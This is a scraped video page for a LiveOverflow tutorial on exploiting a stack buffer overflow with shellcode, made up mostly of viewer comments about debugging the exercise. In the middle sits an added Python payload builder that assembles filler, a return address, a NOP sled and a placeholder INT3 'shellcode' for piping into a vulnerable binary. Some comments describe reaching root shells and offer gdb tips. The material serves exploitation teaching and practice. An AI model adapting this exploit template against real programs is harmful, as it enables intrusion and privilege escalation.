First Exploit! Buffer Overflow with Shellcode - bin 0x0E




All links with "*" are affiliate links.
LiveOverflow / Security Flag GmbH is part of the Amazon Affiliate Partner Program.

#BufferOverflow #BinaryExploitation #Shellcode
Comments

This guy is one of those guys I listen to at normal speed.

enesozdemir

Hahaha you just broke my brain with the NOP Slide vine and the comment: "Riiight, a NOP-Slide." It's like you injected an INT3 into my brain's stack. I can't process stuff anymore. Perfect comedic timing, Hahaha

boomfist

0:56 So do I put on two wizard's hats?

luckyluke

This episode was pretty hard for me. I always watch the episode first and take notes, and after that I try it for myself. I had big difficulties executing the shellcode outside gdb; after about 1h of putting it at different positions, I finally got it to work by adding more NOPs and picking a deeper address. What a nice feeling when it finally gave me root privileges.

ChuZZZta

Just a little reminder: at 8:18 he's adding 30 as a decimal value to the address. I was wondering why I still got an 'illegal instruction' message, until I checked in dbg, only to see that it added 30 as a decimal value and not as hex. This resulted in my offset being too small and not hitting the NOPs. Using 'eip = struct.pack("I", <address> + 0x30)' resolved this issue and I got the 'Trace/breakpoint trap'. When you get your head around this stuff it's really fascinating. Thanks for the great videos!

MyTokyodrift

Implemented the exploit on the buffer and got stuck for longer than I'd like to admit. One thing I learned the hard way: make sure that your exploit instructions don't start overwriting themselves through stack pushes, shortening the NOP slide; adding more padding after the exploit instructions fixed things.
I now understand why @LiveOverflow chose to traverse the stack in the "opposite" direction. That made things considerably easier: a long NOP slide, no worries about shellcode self-destruction, and generally fewer space restrictions for the exploit.


Absolutely great content!
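
A small payload builder that makes the points in the two comments above concrete: the NOP sled and shellcode are placed above the saved return address (so the shellcode's own pushes, which write below ESP, cannot clobber it), the return address aims at the middle of the sled, and the offset added to the address is a hex value, not a decimal one. This is an added example, not code from the video or from LiveOverflow. The stack address, the offset to the saved EIP and the sled length are made-up placeholders you would replace with what gdb shows for your own binary, and the "shellcode" is a single INT3 byte so a hit shows up as "Trace/breakpoint trap" instead of a shell.

```python
import struct
import sys

NOP = b"\x90"   # x86 "nop": execution slides through it to the next byte
INT3 = b"\xcc"  # x86 "int3": a safe stand-in for shellcode; reaching it gives "Trace/breakpoint trap"


def build_payload(eip_offset, ret_addr, nop_len, shellcode, trailing_pad=32):
    """Assemble the bytes fed to the vulnerable program.

    Layout, lowest stack address first:

        [filler x eip_offset][ret_addr][NOP sled x nop_len][shellcode][trailing NOPs]

    The sled and shellcode sit above the saved return address, so after `ret`
    ESP points at the start of the sled and the shellcode's own pushes (which
    write below ESP) cannot overwrite the shellcode.  trailing_pad adds a few
    more bytes after the shellcode so that a slightly-off sled address does not
    run off the end of the payload into unrelated stack contents.
    """
    if eip_offset < 0 or nop_len <= 0:
        raise ValueError("need a non-negative EIP offset and a non-empty sled")
    return (b"A" * eip_offset
            + struct.pack("<I", ret_addr)   # little-endian 32-bit, as on the video's 32-bit target
            + NOP * nop_len
            + shellcode
            + NOP * trailing_pad)


def sled_bounds(payload_addr, eip_offset, nop_len):
    """Half-open [start, end) of stack addresses that land on the NOP sled.

    payload_addr is where the first payload byte ends up on the stack (read it
    from gdb; it moves with the environment, which is why you aim for the
    middle of the sled rather than its first byte).
    """
    start = payload_addr + eip_offset + 4   # skip the filler and the 4-byte return address
    return start, start + nop_len


def choose_ret_addr(payload_addr, eip_offset, nop_len):
    """Aim at the middle of the sled: the safest target when the real stack
    address differs from the one seen under gdb by a few dozen bytes."""
    start, end = sled_bounds(payload_addr, eip_offset, nop_len)
    return start + (end - start) // 2


def lands_on_sled(ret_addr, payload_addr, eip_offset, nop_len):
    """True if jumping to ret_addr starts execution somewhere inside the sled."""
    start, end = sled_bounds(payload_addr, eip_offset, nop_len)
    return start <= ret_addr < end


if __name__ == "__main__":
    # Constructed placeholder numbers, not values from the video:
    payload_addr = 0xffffd500   # where gdb showed the first payload byte
    eip_offset = 76             # bytes from the buffer start to the saved EIP
    nop_len = 100

    # The "30 vs 0x30" trap from the comments: the same observed address plus
    # "30", but only the hex offset reaches the sled.
    sled_start, _ = sled_bounds(payload_addr, eip_offset, nop_len)
    seen = sled_start - 40      # an address gdb showed just below the sled
    for off in (30, 0x30):
        print("%#x + %d -> %#x on sled: %s" % (seen, off, seen + off,
              lands_on_sled(seen + off, payload_addr, eip_offset, nop_len)),
              file=sys.stderr)

    ret = choose_ret_addr(payload_addr, eip_offset, nop_len)
    payload = build_payload(eip_offset, ret, nop_len, INT3)
    sys.stdout.buffer.write(payload)   # pipe into the target: python3 exploit.py | ./vuln
```

Diagnostics go to stderr so that only the raw payload reaches the pipe. If the target dies with "Illegal instruction" rather than "Trace/breakpoint trap", the return address missed the sled; re-read the payload's address in the same environment the program is actually run in and re-check it against sled_bounds.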

eXecue

Instructions unclear, ran out of wizard hats!

LQ

After watching this i have been discouraged to want to learn about computers. This intimidated the shit out of me, the level of understanding and knowledge you guys have is incredible!

racoonrotary

As you mentioned, the stack can be unreliable, and even though you use "unset env" in gdb, you can have some trouble.
You can use set exec-wrapper in gdb to ensure that the program runs with env -i:

(gdb) set exec-wrapper /usr/bin/env -i

Thanks a lot for all your work, I'm learning a lot.

MrEzork

@10:55 you absolute legend, that same thing has been stumping me for weeks. I tried similar commands but didn't think of putting them in brackets. Thanks!

Escarii

That last 30 seconds is very tricky/clever. Thanks for including it. I would have been stuck for a long time... :)

JohnSmith-hexg

Holy crap, took me 2 tries (messed up my nop slide) but the feeling when I typed "whoami" > root was SO worth it!
Thanks man, thanks a lot.

redgek

This was a great intro to buffer overflows. It was a little challenging to get working on a modern 64-bit Linux system, but I finally figured it out. It would be really cool to see an updated video on this. Keep up the good work man!

xOoOverflw

I was shocked that my left speakers stopped working after hearing your intro. Damn they are my new ones :O

drtyharry

I think I just fried my brain, this was so intense for me, but I got it working in the end, so worth!

sweet-sinner

Wow, I’ve been following your channel for quite a while and just stumbled upon this vid now. Have to say this is a great companion for my current course in x86 asm since the content ties everything I learned so far together and from a very practical POV too. Thanks for the great content as always!

aaaaanh

INFORMATION OVERFLOW

Too much info and stuff happening. I will watch again in a few days after doing some googling.

silverzero

I like that your pronunciation is very clear to understand, and how you explain things is awesome.

alegerminal

I had a different memory address and had to add 64 to my stack for the Trace/breakpoint trap to work.

alexsepelenco

3:37 opcode "\xCC" (INT3)
8:09 NOP sled
9:03 shellcode database
10:27 shell without input

helloworld